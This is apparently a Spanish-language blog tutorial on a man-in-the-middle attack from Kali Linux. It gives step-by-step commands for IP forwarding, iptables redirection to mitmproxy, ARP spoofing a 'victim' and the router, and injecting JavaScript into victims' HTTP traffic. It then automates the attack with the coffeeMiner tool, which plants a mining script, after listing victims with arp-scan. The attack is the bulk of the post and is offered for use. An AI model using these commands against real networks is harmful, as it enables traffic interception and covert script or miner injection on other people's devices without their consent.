Advertisement

header ads

EL MEJOR ATAQUE DE MITM EN KALI LINUX

Hace un par de días he estado leyendo y revisando el código de esta gran herramienta aunque me gusta que todo esta automatizada, ahora quiero aclarar que voy a explicar todo sobre este método para que vayan entiendo.

Te dejo el post original aquí.


Ahora vamos a tomar la herramienta y modificarla a nuestro gusto, pero antes de empezar quisiera agradecer a muts por compartirme la solución de MITMPROXY que desde diciembre estuvo con fallos y por fin logran solucionarlo te paso como lo resolvieron.



Estuve leyendo el post original y mucho no entendía porque en ese momento la herramienta estaba con fallos entonces decidí buscar algunos post nuevos para intentar hacer el mismo ataque pero manualmente hasta que solucionaron la herramienta logre hacerlo.
Todo bien con el post original pero vamos a ver un poco de concepto de las herramientas y manualmente y luego vamos al final con la herramienta.

¿Qué es Mitmproxy?

Mitmproxy es una aplicación proxy de código abierto que permite interceptar conexiones HTTP y HTTPS entre cualquier cliente HTTP(S) (como un navegador móvil o de escritorio) y un servidor web que usa un ataque típico l man-in-the-middle attack(MITM). De forma similar a otros proxies (como Squid), acepta conexiones de clientes y las envía al servidor de destino. Sin embargo, mientras que otros proxies generalmente se enfocan en el filtrado de contenido o la optimización de velocidad mediante el almacenamiento en caché, el objetivo de mitmproxy es permitir que un atacante monitoree, capture y altere estas conexiones en tiempo real.

Instalación

apt-get install python-pyasn1 python-flask python-urwid python-dev libxml2-dev libxslt-dev libffi-dev
apt-get install mitmproxy
pip install mitmproxy
En la ultima actualización de KALI LINUX lo corrigieron entonces no creo que tenga más problemas en kali linux 4.14 kali3.

Funcionamiento Manualmente

habilitamos reenvío de IP y redirección de puerto
sysctl -w net.ipv4.ip_forward=1
Para verificar vamos a usar el siguiente comando y vamos a tener como respuesta “1”
cat /proc/sys/net/ipv4/ip_forward
Ahora vamos a configurar nuestro iptables, tenes que fijarte con la interfaz que usas en mi wlan0 porque use mi laptop pero lo usaremos para el puerto 80, 443
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
En caso de no entender o comprobar que hiciste con los comando te darás cuenta usando el siguiente comando
iptables -t nat -L
En caso de borrarlo
iptables -t nat -F
Y para volver a su lugar el 1
sysctl -w net.ipv4.ip_forward=0
Este caso solo es en caso de regresar todo en su lugar.

HTTPS TRAFICO

Detectar tráfico con mitmproxy está limitado solo a las conversaciones HTTP y HTTPS, lo que significa que no puedes escuchar tráfico que no sea HTTP(S) con mitmproxy. Si le interesa la detección transparente de sockets SSL, es posible que desee probar SSLsplit, un proxy TLS/SSL transparente en el medio. Esté ejemplo con ssl lo voy a hacer el siguiente post en caso si veo mucho que mucho lo compartieron.

ATTACK MANUAL

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
Lo que vamos hacer es agregar la IP de la victima y la IP de tu router y viceversa.
VICTIMA 192.168.1.7
ROUTE 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.7
arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1
Ahora vamos hacer subir el js que va hacer el ataque.
python -m SimpleHTTPServer 80
Ahora vamos hacer el ataque
mitmdump -s "js_injector.py http://192.168.1.2/harlem-shake.js" -T
Obviamente esta carpeta de js_injector.py te puedes copiar y pegar de la misma herramienta que vamos a usar después.

ATTACK AUTOMÁTICO

Ahora si podemos usar la herramienta automáticamente solo vamos a descargar lo siguiente.
git clone https://github.com/arnaucode/coffeeMiner.git
Instalar lo siguiente
bash install.sh
Después vamos agregar todas las IP de nuestra victimas, llenarlo con el siguiente comando
arp-scan -l
nano victims.txt
Ahora vamos a modificar el siguiente código de la herramienta
os.system("/usr/bin/mitmdump -s 'injector.py http://192.168.1.2:8000/script.js' -T")
Lo que vamos a modificar es la ubicación de mitmdump con locate, y luego la IP de tu maquina porque ahí se subió el js, tambien podemos modificarlo según el texto que queres agregar en /miner_script/script.js.
Según la herramienta te pide modificar la interfaz pero si querés usar una IP fija.
Ahora vamos a ejecutar la siguiente herramienta.
Con el siguiente comando podes encontrar la IP de tu gateway.
route -n
python3 coffeeMiner.py 192.168.1.1
En mi caso 192.168.1.1 es de mi router, también he agregado las ip de mis victimas luego la herramienta hace su trabajo, pero podemos ingresar la maquina de tu victima y le aparece el mensaje como un XSS, también podemos modificar el js.

LISTO! Ahora si queres usar con HTTPS, no te olvides en compartirlo y seguiré subiendo otra parte con esta herramienta. GRACIAS!

Publicar un comentario

0 Comentarios